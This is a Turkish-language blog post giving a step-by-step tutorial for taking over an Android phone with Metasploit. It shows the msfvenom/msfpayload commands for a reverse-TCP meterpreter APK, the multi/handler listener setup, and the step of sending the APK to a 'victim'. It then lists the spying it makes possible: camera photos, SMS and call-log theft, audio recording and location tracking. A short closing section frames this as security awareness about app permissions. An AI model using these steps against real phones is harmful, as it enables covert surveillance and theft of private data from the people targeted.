Merhaba Değerli Takipçilerim,
Bu yazımda Android sistemlerin nasıl hacklenebildiğini, hacklendikten sonra neler yapılabilindiğini ve son olarak karşılaşabileceğiniz olası durumlardan bahsedeceğim.
Aşağıda bahsetmiş olduğum uygulama adımlarını Unix, Linux veya Windows sistemler üzerinden gerçekleştirebilirsiniz. Ben işlem adımlarımı Kali Linux üzerinen gerçekleştiriyor olucam. Adım adım ilerleyerek android sisteme sızmaya çalışalım...
Adım 1:
Öncelikle sızmak istediğimiz telefon için bir tane apk uzantılı payload oluşturmamız ve 4444 portunu kullanmış olduğumuz işletim sisteminde aktif hale getirmemiz gerekiyor.
Haydi oluşturalım...
- msfpayload android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk
ya da
- msfvenom -p android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk
komut satırlarını yazarak payloadımız olacak olan apk dosyasını üretebilirsiniz.
Apk dosyasını oluşturduktan ve 4444 portunu açtıktan sonra sonra ikinci adıma geçebiliriz.
Adım 2:
Komut satırımıza msfconsole yazarak Metasploit aracını çalıştıralım.
Adım 3:
- Metasploit çalıştıktan sonra multi-handler exploitini yükleyerek işlemlerimize devam edebiliriz. multi-handler exploit: use exploit/multi/handler
- Ardından payload tipini seçerek payloadımızı ayarlayalım. Android payload: set payload android/meterpreter/reverse_tcp
- Daha sonra host ve port ayarları yapılarak işleme devam edilir. Host: set LHOST ip adresiniz Port: set LPORT 4444
Adım 4:
Oluşturmuş olduğumuz apk dosyasını ele geçirilmek istenilen kişininin telefonuna gönderilir ve ardından komut satırına exploit yazılarak kurbanın uygulamayı yüklemesi beklenir.
Kurban, apk dosyasını kurduktan itibaren artık mevcut telefon üzerinde istediğiniz şekilde işlem yapabilirsiniz. Erişim sağlanan telefon üzerinde ne tür işlemler yapabileceğinize help yazarak ulaşabilirsiniz.
Kullanılabilinen özellikler listesi şu şekildedir;
Hemen hemen tüm özelliklere baktım ve sizlerle en çok dikkat çeken birkaç özelliği paylaşmak istiyorum.
Kendi bilgisayarınız üzerinden sızmış olduğunuz telefonun;
- Kamerasıyla bulunulan ortamın fotoğrafını çekebilirsiniz,
- Telefonda var olan tüm sms kayıtlarını çekebilirsiniz,
- Bilgisayarınız üzerinden komut satırı ile istediğiniz numaraya kurbanın telefonundan sms gönderebilirsiniz,
- Telefonda var olan tüm rehber kayıtlarını çekebilirsiniz,
- Telefonda var olan tüm arama kayıtlarını çekebilirsiniz,
- Telefon rootlu ise kök dizininde yer alan veri tabanı dosyalarını çekebilirsiniz,
- Telefonun bulunduğu ortamı ses kaydına alabilirsiniz.
- Telefonun o anki konumuna erişme imkanı, o an kullanmış olduğu ip bilgisi, telefonun ekran görüntüsü yani kısaca aklınıza gelen hemen hemen herşeyi uzaktan yapabiliyorsunuz.
Kullanımına ilişkin örnek ekran görüntüsü:
örnekteki gibi istediğiniz özelliğin ismini yazarak sonuna -h parametresini eklediğinizde özelliğin nasıl kullanıldığını size gösterecektir.
Ne kadar da korkunç değil mi böyle düşününce ? Ama farkında mısınız bilmiyorum ama şuan telefonunuzda kurulu olan hemen hemen her uygulama kurulurken sizden istediği izinler ile bunları maalesef yapabiliyor ve yapmıştırda.
Bazılarınız belki şunu sorabilirler,
- eee biz uygulamayı ona göndereceksek ve o kuracaksa bunun neresi hackleme diye ?
+ Evet haklısınız ama şununda farkında olmanız gerekiyor bu yazımıdaki temel amaç farkındalık yaratmaktı. Bugün milyonlarca uygulama google play üzerinden veya herhangi uygulama sağlayıcıları sayesinde indirilip telefonlara kuruluyor ama çok az insan bu uygulamaların istemiş olduğu izinlerin farkında. Yani demem o ki zaten birileri bizlere bunları popüler uygulamalar ile çoktan enjekte etmiş durumdalar.
Her ne kadar dünya çapında kendini ispatlamış popüler mobil uygulamalar da olsa bana göre hiçbir uygulama güvenli olmamakla birlikte tüm mahrem bilgileriniz az önce göstermiş olduğum mantık ve daha ileri bir teknoloji ile zaten elde etmiş durumdalar.
Daha güvenli bir mobil kullanım için gerekmedikçe uygulama izinlerimizi kapalı tutalım ve her uygulamayı telefonumuza indirmeyelim.
Okuduğunuz için teşekkür eder, iyi günler dilerim. :)